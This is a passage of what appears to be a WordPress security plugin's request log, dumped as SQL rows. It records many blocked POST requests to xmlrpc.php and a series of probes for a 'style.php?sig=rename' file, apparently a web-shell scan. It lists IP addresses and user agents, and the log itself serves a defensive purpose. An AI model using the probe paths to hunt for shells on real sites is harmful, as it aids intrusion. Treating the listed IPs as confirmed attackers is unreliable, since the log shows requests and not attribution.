Firefox\\/18.0\"}','tRTMfNhKleBmUxGcZjsQO5Eg',0,1681343734.5650,1224,'','POST',403,0,515,0,1,'',0),('85.236.153.74',1441569098,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-X420) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','oZ4sra1ANDRCGw5v6S9KQ2td',0,1681343742.4735,592,'','POST',403,0,515,0,1,'',0),('194.4.57.111',3255056751,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPad; CPU OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','abwej5YN7Js9LxH1AhotcXPI',0,1681343745.1946,586,'','POST',403,0,515,0,1,'',0),('173.201.191.100',2915680100,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:40.0) Gecko\\/20100101 Firefox\\/40.0\"}','S7UY2ZqykN1Hh0Q8GJDsCzaV',0,1681343749.4946,862,'','POST',403,0,515,0,1,'',0),('128.199.225.241',2160583153,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','fGKNZWmTy4R2PhMVJ5g8l7Ar',0,1681343750.1541,731,'','POST',403,0,515,0,1,'',0),('52.139.225.218',881582554,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPod; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','GAJhIUryNjW3QgBZibmCTdpY',0,1681343765.2014,570,'','POST',403,0,515,0,1,'',0),('192.99.19.65',3227718465,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','HgWms3GyA68wXNRuqKDrOZCM',0,1681346414.0339,1476,'','POST',403,0,515,0,1,'',0),('45.77.175.167',760065959,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','SCHmQ1xt8uK6qsL5cg7nIlfF',0,1681346417.3035,575,'','POST',403,0,515,0,1,'',0),('45.67.217.234',759421418,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-G960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','zMoBeiWpcGFvIr2JjtlSN6T4',0,1681346424.8586,1298,'','POST',403,0,515,0,1,'',0),('198.27.68.197',3323675845,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','im056ORk3CTZbMs4noDQAUqg',0,1681346424.9587,1285,'','POST',403,0,515,0,1,'',0),('69.16.227.57',1158734649,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','UsVilx5qwM6NcmGB2kPSXgEF',0,1681346446.4170,631,'','POST',403,0,515,0,1,'',0),('69.49.247.110',1160902510,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','eXKFZY0R145xAcbgEiHuSC8M',0,1681346447.1638,572,'','POST',403,0,515,0,1,'',0),('91.204.46.124',1540107900,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-X420) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','u6RAJwCskW5hya3NGrjQI4Yz',0,1681346451.5302,828,'','POST',403,0,515,0,1,'',0),('45.140.185.41',764197161,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q720) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','4yGh2Cb0d59UBVrlRXxt3761',0,1681346452.4764,1388,'','POST',403,0,515,0,1,'',0),('192.64.117.87',3225449815,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.104 Safari\\/537.36\"}','16CfYjBpcL0UnvlHa8IdkP7F',0,1681346452.4699,1396,'','POST',403,0,515,0,1,'',0),('194.169.175.26',3265900314,'','http://cmdev-site1.com/style.php?sig=rename','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','j97KC6SycXTb21d0mguoZBO4',0,1681346911.3750,1541,'','GET',403,0,700,0,1,'',0),('194.169.175.26',3265900314,'','http://cmdev-site1.com/wp-includes/style.php?sig=rename','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','SBleDzghQ94ULIfFAMKn2GOv',0,1681346913.8590,300,'','GET',403,0,700,0,1,'',0),('194.169.175.26',3265900314,'','http://cmdev-site1.com/wp-content/style.php?sig=rename','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','WqyOx2oJ1bgknNrvd85eCKXi',0,1681346915.6863,294,'','GET',403,0,700,0,1,'',0),('194.169.175.26',3265900314,'','http://cmdev-site1.com/wp-admin/style.php?sig=rename','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','YPmpnFtCdva20IiAJ4ErlyNG',0,1681346916.8919,302,'','GET',403,0,700,0,1,'',0),('3.231.146.243',65508083,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko\\/20100101 Firefox\\/38.0\"}','G1izOgRYkmpoBuZ54KMPCTr2',0,1681349060.7490,573,'','POST',403,0,515,0,1,'',0),('193.123.87.139',3246086027,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','de9RvE2kArOlIDFzhCNasPGj',0,1681349064.8996,1261,'','POST',403,0,515,0,1,'',0),('91.204.46.124',1540107900,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','iBG34ExrCJjv8n0wOWf2MYKe',0,1681349065.1720,1416,'','POST',403,0,515,0,1,'',0),('209.126.6.155',3514697371,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:17.0) Gecko\\/20100101 Firefox\\/20.6.14\"}','IpHeomyf39giFtbrA7j5JTcU',0,1681349074.2090,659,'','POST',403,0,515,0,1,'',0),('81.181.130.56',1370849848,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q710(FGN)) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','47YpaILz8u5ECoMGr6W9RNnZ',0,1681349075.0008,554,'','POST',403,0,515,0,1,'',0),('68.183.83.210',1152865234,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','VWAHpdgLQSeFP1ntmyc6BCMG',0,1681350572.4998,760,'','POST',403,0,515,0,1,'',0),('156.224.21.75',2631931211,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','g8wGduU5XBCTRbMzJxQqFNmc',0,1681350573.5999,564,'','POST',403,0,515,0,1,'',0),('159.223.60.241',2682207473,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','VbEkqgm7ifScQjpF0HKlJOPX',0,1681350577.4694,566,'','POST',403,0,515,0,1,'',0),('8.210.238.120',148041336,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','RX7BknmLSvlbTtK290Dx5O34',0,1681350586.1758,695,'','POST',403,0,515,0,1,'',0),('159.223.60.241',2682207473,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','D16n3Nk9dez2LC0RPcEumbq7',0,1681350587.0383,565,'','POST',403,0,515,0,1,'',0),('184.168.98.87',3098042967,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.76 Safari\\/537.36\"}','HIFqTsfCEUrjRMgGD41NeSL8',0,1681350596.4045,1386,'','POST',403,0,515,0,1,'',0),('52.74.155.156',877304732,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.93 Safari\\/537.36\"}','VaEh0MfZ89jQHB1gq27ulxyR',0,1681350599.4486,576,'','POST',403,0,515,0,1,'',0),('5.9.178.235',84521707,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','TJo9s1wnGIRY4U5tKma6gVr2',0,1681350605.8848,732,'','POST',403,0,515,0,1,'',0),('51.144.123.73',865106761,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','atEVFQmsKPDR08WYGX5igNTH',0,1681350608.9569,585,'','POST',403,0,515,0,1,'',0),('192.114.164.226',3228738786,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','amTrcS0P3f14G7yJVYl9DwxC',0,1681350613.2193,642,'','POST',403,0,515,0,1,'',0),('210.116.66.47',3530834479,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','qsUYAfQjEZM0lpV7K8xJG2bm',0,1681353119.9917,835,'','POST',403,0,515,0,1,'',0),('5.22.249.133',85391749,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','yNZOlXAVifmqet8jGsdcYb1L',0,1681353134.2737,575,'','POST',403,0,515,0,1,'',0),('122.114.158.225',2054332129,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','j8nSyMX391DeP4RltiHoOpTG',0,1681353142.1593,615,'','POST',403,0,515,0,1,'',0),('193.123.87.139',3246086027,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','TACbu1yBI8QNid4ejYkhXwxp',0,1681353153.5190,604,'','POST',403,0,515,0,1,'',0),('194.233.85.167',3270071719,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','eBPqWlrpwE3mxTOGaRZjVy2K',0,1681353157.1649,597,'','POST',403,0,515,0,1,'',0),('69.16.227.57',1158734649,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.212 Safari\\/537.36\"}','oULpa16x3SY4QKqg5nmkjcPb',0,1681353162.9633,633,'','POST',403,0,515,0,1,'',0),('74.201.28.5',1254693893,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.114 Safari\\/537.36\"}','MBrHSe0EfX23igbjv7nAT5GP',0,1681353443.8393,691,'','POST',403,0,515,0,1,'',0),('74.201.28.5',1254693893,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.114 Safari\\/537.36\"}','nMaclmTfzZYH9ehv4uSidqPC',0,1681353446.8156,569,'','POST',403,0,515,0,1,'',0),('74.201.28.5',1254693893,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.114 Safari\\/537.36\"}','8mr3exFNBW1CytOPpfzQ7JgL',0,1681353448.2837,415,'','POST',404,0,515,0,1,'',0),('74.201.28.5',1254693893,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.114 Safari\\/537.36\"}','lxQoUkW7XHeIF6ADvn5shOc9',0,1681353449.0151,402,'','POST',404,0,515,0,1,'',0),('74.201.28.5',1254693893,'','http://cmdev-site1.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.114 Safari\\/537.36\",\"2\":\"http:\\/\\/cmdev-site1.com\\/wp-login.php\"}','ZUTS2mMHV0axoF3uCPjL5Wr7',0,1681353449.6947,640,'','POST',404,0,600,0,1,'',0),('66.29.132.22',1109230614,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','AnrZ8MiRTXhYyaN43DFPmvO9',0,1681354288.7849,1928,'','POST',403,0,515,0,1,'',0),('119.18.52.231',1997681895,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','XByJ9mYxQcWNCfHpuZ76D3vn',0,1681354289.5600,1367,'','POST',403,0,515,0,1,'',0),('68.183.83.210',1152865234,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','Lj16y9NHtCW2ZMaYr8oDRv7e',0,1681354294.8830,573,'','POST',403,0,515,0,1,'',0),('156.38.151.68',2619774788,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko\\/20100101 Firefox\\/42.0\"}','eBiDgJ2UouGTM8KvHaN9nsSQ',0,1681354299.3650,576,'','POST',403,0,515,0,1,'',0),('176.119.210.163',2960642723,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','JW6cZbzFmu8TrvgKi9qNDeV7',0,1681354305.4698,666,'','POST',403,0,515,0,1,'',0),('148.72.232.52',2487806004,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','AzC4v3xtUTjguQc7rwaqe0mY',0,1681354306.4171,1122,'','POST',403,0,515,0,1,'',0),('104.168.133.147',1755874707,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko\\/20100101 Firefox\\/40.1\"}','69RlZI0EMFvoxupdr4827Szn',0,1681354307.0438,946,'','POST',403,0,515,0,1,'',0),('142.93.223.16',2388516624,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','4ZPhHK8D7xIOaEmAXeytnpw3',0,1681354311.8075,547,'','POST',403,0,515,0,1,'',0),('103.142.25.164',1737365924,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/83.0.4103.116 Safari\\/537.36\"}','MowrnqiTNhVQR83m76b2KpE4',0,1681356815.0556,568,'','POST',403,0,515,0,1,'',0),('81.223.232.24',1373628440,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko\\/20100101 Firefox\\/41.0\"}','wnKGUxg246OSdbJ9Xhf8yla3',0,1681356821.9127,1065,'','POST',403,0,515,0,1,'',0),('81.181.130.56',1370849848,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko\\/20100101 Firefox\\/18.0\"}','5CrVQe4SUjtIsZfM9g8XqkPE',0,1681356822.5632,858,'','POST',403,0,515,0,1,'',0),('216.128.130.149',3632300693,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko\\/20100101 Firefox\\/18.0\"}','RSJtaYPZhAwBuM6ydsX5FHvI',0,1681356825.9252,606,'','POST',403,0,515,0,1,'',0),('91.134.248.211',1535572179,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','IX6NxS8avVLQhBRp1d2UtOk3',0,1681356833.1134,540,'','POST',403,0,515,0,1,'',0),('202.172.28.70',3400277062,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.135 Safari\\/537.36\"}','L5xdQpDq0Gz6J7BMo3R98UhT',0,1681359303.4274,962,'','POST',403,0,515,0,1,'',0),('156.38.151.68',2619774788,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.138 Safari\\/537.36\"}','jpXbyOkYoF7cZrQq1Jh2Dd86',0,1681359304.7795,817,'','POST',403,0,515,0,1,'',0),('79.170.40.177',1336551601,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','yXoqkNlxdKRp3t2uLSIEPe8h',0,1681359315.2474,1965,'','POST',403,0,515,0,1,'',0),('184.168.96.211',3098042579,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPad; CPU OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','LKdiOn2AlUBmfFb7teyTVPgs',0,1681359314.4658,2747,'','POST',403,0,515,0,1,'',0),('81.181.130.56',1370849848,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:17.0) Gecko\\/20100101 Firefox\\/20.6.14\"}','cyGxgPOhNmSJ4e6WU3v8Dnw5',0,1681360702.1414,732,'','POST',403,0,515,0,1,'',0),('79.124.76.220',1333546204,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.1 (KHTML, like Gecko) Chrome\\/21.0.1180.83 Safari\\/537.1\"}','XLWSTirzOmlcYEDJFM36d2qP',0,1681360709.9631,660,'','POST',403,0,515,0,1,'',0),('67.225.140.11',1138854923,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','3Nrb5KsuFMJ6jilvq4EeyGHk',0,1681360712.0554,580,'','POST',403,0,515,0,1,'',0),('212.23.66.162',3558294178,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q710(FGN)) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','HWTljEIFznqXy3tLBSZ8fNdO',0,1681360722.6418,563,'','POST',403,0,515,0,1,'',0),('185.98.5.176',3110208944,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','FmfoUlukzMv8xAZ0wTtIc3rb',0,1681360729.6793,678,'','POST',403,0,515,0,1,'',0),('182.92.129.110',3059515758,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko\\/20100101 Firefox\\/44.0\"}','BbXWKRxyZnHkuChY1Ggi3pE8',0,1681360743.1362,597,'','POST',403,0,515,0,1,'',0),('193.123.87.139',3246086027,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','c0lW8zmejT9A7uDxXOYZLQH5',0,1681360751.6873,682,'','POST',403,0,515,0,1,'',0),('91.107.196.183',1533789367,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:7.0.1) Gecko\\/20100101 Firefox\\/7.0.1\"}','1xRYrVsv2TKiNbmWMdgUAu5f',0,1681360756.5205,612,'','POST',403,0,515,0,1,'',0),('168.119.136.101',2826405989,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-X420) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','Hcfbpik5KnvXwP8aQyUgzZWq',0,1681364341.4800,569,'','POST',403,0,515,0,1,'',0),('52.74.155.156',877304732,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','zbUXMT0dBWZlCiw7Sxet8qcm',0,1681364352.5821,606,'','POST',403,0,515,0,1,'',0),('185.182.56.188',3115727036,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-G960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','NsQn0VIi3j4kwfD5u9TZadK2',0,1681364353.5647,988,'','POST',403,0,515,0,1,'',0),('37.32.31.163',622862243,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','dzHncI1GBOWxmaMeFr7vQDlu',0,1681364358.1304,578,'','POST',403,0,515,0,1,'',0),('67.205.178.151',1137554071,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','3EXyKHT2qhdFIsbQZPnR6x1D',0,1681364367.8404,598,'','POST',403,0,515,0,1,'',0),('202.172.28.70',3400277062,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','dhH4LbGfQask5x7XWUtM0jEm',0,1681364368.9679,574,'','POST',403,0,515,0,1,'',0),('121.40.223.33',2032721697,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','8NBHXe0iE9nOuaVCG1xPg7Z2',0,1681364369.7682,569,'','POST',403,0,515,0,1,'',0),('85.236.153.74',1441569098,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','nCvgl8Ms2r3U619ISNfAdKbo',0,1681370710.2427,1487,'','POST',403,0,515,0,1,'',0),('148.72.210.101',2487800421,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.99 Safari\\/537.36\"}','LQq4mWCZ1c7bv260RzB8fTy5',0,1681370716.4052,580,'','POST',403,0,515,0,1,'',0),('45.130.104.194',763521218,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.1 (KHTML, like Gecko) Chrome\\/21.0.1180.83 Safari\\/537.1\"}','QKoRqZpxvVMOCd92Tyu4Ltjw',0,1681370717.1987,624,'','POST',403,0,515,0,1,'',0),('68.178.145.169',1152553385,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','DexHUJm0dAaLPsXIZiYkSqNw',0,1681370731.0906,670,'','POST',403,0,515,0,1,'',0),('103.178.57.232',1739733480,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.186 